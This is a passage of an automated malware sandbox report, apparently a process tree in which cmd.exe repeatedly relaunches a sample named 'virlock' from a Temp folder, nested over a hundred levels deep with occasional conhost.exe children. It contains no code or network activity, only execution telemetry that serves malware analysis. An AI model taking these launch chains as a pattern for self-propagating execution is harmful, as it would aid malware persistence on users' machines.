C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
66⤵
PID:180

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
67⤵
PID:4400

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
68⤵
PID:1872

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
69⤵
PID:3756

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
70⤵
PID:1036

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
71⤵
PID:3856

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
72⤵
PID:1656

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
73⤵
PID:2700

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
74⤵
PID:3656

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
75⤵
PID:3428

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
76⤵
PID:3000

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
77⤵
PID:1900

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
78⤵
PID:2092

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
79⤵
PID:836

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
80⤵
PID:3684

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
81⤵
PID:1924

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
82⤵
PID:4316

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
83⤵
PID:392

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
84⤵
PID:4752

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
85⤵
PID:4636

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
86⤵
PID:4568

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
87⤵
PID:2716

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
88⤵
PID:3040

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
89⤵
PID:1840

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
90⤵
PID:4580

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
91⤵
PID:1852

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
92⤵
PID:4384

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
93⤵
PID:2472

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
94⤵
PID:3428

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
95⤵
PID:2964

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
96⤵
PID:3276

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
97⤵
PID:1564

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
98⤵
PID:4524

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
99⤵
PID:3252

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
100⤵
PID:4856

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
101⤵
PID:4424

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
101⤵
PID:2448

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
102⤵
PID:3028

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
103⤵
PID:2996

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
104⤵
PID:3672

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
105⤵
PID:3932

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
106⤵
PID:4524

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
107⤵
PID:1668

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
108⤵
PID:4872

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
109⤵
PID:5080

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
110⤵
PID:4232

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
111⤵
PID:2364

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
112⤵
PID:2436

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
113⤵
PID:1804

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
114⤵
PID:4916

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
115⤵
PID:1888

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
116⤵
PID:4348

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
117⤵
PID:4204

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
118⤵
PID:4500

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
119⤵
PID:4232

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
120⤵
PID:3856

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
121⤵
PID:2436

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
122⤵
PID:1884

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
123⤵
PID:3620

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
124⤵
PID:1536

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
125⤵
PID:1676

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
126⤵
PID:1644

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
127⤵
PID:4872

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
127⤵
PID:220

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
128⤵
PID:312

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
129⤵
PID:180

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
130⤵
PID:2412

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
131⤵
PID:4544

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
132⤵
PID:4652

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
133⤵
PID:2524

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
134⤵
PID:2676

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
135⤵
PID:5040

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
135⤵
PID:3372

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
136⤵
PID:4500

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
137⤵
PID:4772

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
138⤵
PID:116

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
139⤵
PID:3012

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
140⤵
PID:3268

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
141⤵
PID:4064

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
141⤵
PID:4360

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
142⤵
PID:3924

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
143⤵
PID:5024

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
144⤵
PID:4020

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
145⤵
PID:4400

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
146⤵
PID:4568

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
147⤵
PID:4212

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
148⤵
PID:1856

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
149⤵
PID:3656

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
150⤵
PID:4492

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
151⤵
PID:3576

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
152⤵
PID:1716

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
153⤵
PID:4460

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
154⤵
PID:1416

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
155⤵
PID:4416

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
156⤵
PID:3064

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
157⤵
PID:1676

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
157⤵
PID:2352

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
158⤵
PID:3924

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
159⤵
PID:4044

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
160⤵
PID:2980

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
161⤵
PID:1512

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
162⤵
PID:3400

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
163⤵
PID:1028

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
164⤵
PID:2284

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
165⤵
PID:1560

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
166⤵
PID:4428

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
167⤵
PID:4576

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
168⤵
PID:3896

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
169⤵
PID:1452

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
170⤵
PID:3700

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
171⤵
PID:4020

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
172⤵
PID:4436

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
173⤵
PID:264

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
174⤵
PID:4676

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
175⤵
PID:4568

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
175⤵
PID:920

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
176⤵
PID:2592

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
177⤵
PID:32

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
178⤵
PID:5024

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
179⤵
PID:4576

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
179⤵
PID:1824

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
180⤵
PID:1452

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
181⤵
PID:4700

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
182⤵
PID:1188

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
183⤵
PID:4044

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
184⤵
PID:4064

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
185⤵
PID:4436

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
186⤵
PID:3200

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
187⤵
PID:920

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
187⤵
PID:1396

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
188⤵
PID:4456

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
189⤵
PID:32

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
189⤵
PID:4404

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
190⤵
PID:3620

C:\Windows\System32\Conhost.exe
